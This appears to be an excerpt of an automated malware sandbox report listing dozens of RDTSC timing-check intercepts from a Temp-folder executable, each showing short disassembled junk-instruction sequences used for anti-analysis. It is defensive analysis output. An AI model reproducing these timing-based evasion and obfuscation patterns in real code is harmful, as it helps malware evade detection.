                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88D630 second address: 88D654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ACh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FAF7C6A41AAh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 88D654 second address: 88D658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 891C29 second address: 891C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8916ED second address: 89174A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF7CBD5D48h 0x0000000d popad 0x0000000e jnp 00007FAF7CBD5D4Ah 0x00000014 jmp 00007FAF7CBD5D3Eh 0x00000019 jne 00007FAF7CBD5D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007FAF7CBD5D45h 0x00000028 jmp 00007FAF7CBD5D3Fh 0x0000002d jc 00007FAF7CBD5D3Eh 0x00000033 push esi 0x00000034 pop esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 89174A second address: 89174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 89174E second address: 891765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF7CBD5D36h 0x0000000a jmp 00007FAF7CBD5D3Dh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 891765 second address: 89176F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8918CF second address: 8918DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D42h 0x00000008 jns 00007FAF7CBD5D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 893EFD second address: 893F1F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41B7h 0x00000008 jmp 00007FAF7C6A41B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 893F1F second address: 893F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 896BC4 second address: 896BD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FAF7C6A41A6h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 896BD5 second address: 896BDF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B1C98 second address: 8B1C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B1C9E second address: 8B1CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FAF7CBD5D3Eh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B1B1E second address: 8B1B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B1B22 second address: 8B1B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B4872 second address: 8B487A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B487A second address: 8B4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8B456E second address: 8B4572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CD51E second address: 8CD539 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7CBD5D36h 0x00000008 jnp 00007FAF7CBD5D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FAF7CBD5D3Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CD539 second address: 8CD53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CC2FD second address: 8CC301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CC301 second address: 8CC307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CC307 second address: 8CC30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CC742 second address: 8CC759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jne 00007FAF7C6A41ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CC759 second address: 8CC768 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CCD74 second address: 8CCD97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF7C6A41B9h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CD21A second address: 8CD23A instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF7CBD5D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FAF7CBD5D36h 0x00000014 jmp 00007FAF7CBD5D3Ch 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CFF56 second address: 8CFF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8CFF5C second address: 8CFF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D0195 second address: 8D01B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B1h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D01B7 second address: 8D01BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D01BC second address: 8D01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D01C2 second address: 8D026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FAF7CBD5D38h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jmp 00007FAF7CBD5D3Dh 0x00000027 push 00000004h 0x00000029 jmp 00007FAF7CBD5D45h 0x0000002e call 00007FAF7CBD5D39h 0x00000033 pushad 0x00000034 jmp 00007FAF7CBD5D3Dh 0x00000039 jg 00007FAF7CBD5D41h 0x0000003f popad 0x00000040 push eax 0x00000041 jg 00007FAF7CBD5D3Eh 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b js 00007FAF7CBD5D3Eh 0x00000051 jc 00007FAF7CBD5D38h 0x00000057 push esi 0x00000058 pop esi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FAF7CBD5D3Ah 0x00000063 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D026B second address: 8D027D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FAF7C6A41A6h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D027D second address: 8D0281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D0281 second address: 8D0295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FAF7C6A41A6h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D1882 second address: 8D1886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8D2F96 second address: 8D2FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FAF7C6A41A6h 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80EC1 second address: 4A80ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80ED9 second address: 4A80F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FAF7C6A41ABh 0x00000015 xor cx, 231Eh 0x0000001a jmp 00007FAF7C6A41B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FAF7C6A41B0h 0x00000026 sbb ecx, 55ABB118h 0x0000002c jmp 00007FAF7C6A41ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80F3D second address: 4A80F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80F43 second address: 4A80F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A80F47 second address: 4A80F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAF7CBD5D3Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D47h 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A709F2 second address: 4A70A29 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAF7C6A41AEh 0x00000008 jmp 00007FAF7C6A41B5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx eax, dx 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70A29 second address: 4A70A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D3Dh 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50132 second address: 4A50159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov al, 84h 0x0000000e movsx edx, cx 0x00000011 popad 0x00000012 push dword ptr [ebp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50159 second address: 4A50176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50176 second address: 4A50194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50194 second address: 4A50198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A50198 second address: 4A5019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A5019E second address: 4A501BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 0ED83FF3h 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7030B second address: 4A70311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7018F second address: 4A70193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70193 second address: 4A70199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70199 second address: 4A7019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7019F second address: 4A701A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701A3 second address: 4A701B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701B2 second address: 4A701B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701B6 second address: 4A701BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701BA second address: 4A701C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701C0 second address: 4A701E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D3Dh 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A701E5 second address: 4A7021C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov dh, E5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FAF7C6A41ADh 0x00000017 sub cx, 3AF6h 0x0000001c jmp 00007FAF7C6A41B1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A7021C second address: 4A70222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70222 second address: 4A70226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70226 second address: 4A7022A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60F46 second address: 4A60F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ecx, 4079CA27h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 mov bx, si 0x00000014 pop ecx 0x00000015 mov di, A396h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edx, ecx 0x00000020 movzx esi, bx 0x00000023 popad 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60F6A second address: 4A60F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 722D1A82h 0x00000014 call 00007FAF7CBD5D43h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A60F93 second address: 4A60FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70EB7 second address: 4A70EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70EBF second address: 4A70EE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7C6A41B7h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70EE7 second address: 4A70EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A70EFF second address: 4A70F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC002C second address: 4AC0044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D44h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC0044 second address: 4AC0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7C6A41B8h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC0069 second address: 4AC006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC006D second address: 4AC0073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC0073 second address: 4AC0079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC0079 second address: 4AC008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC008B second address: 4AC009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Fh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4AC009E second address: 4AC00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 4A90346 second address: 4A90374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAF7CBD5D48h 0x00000013 rdtsc
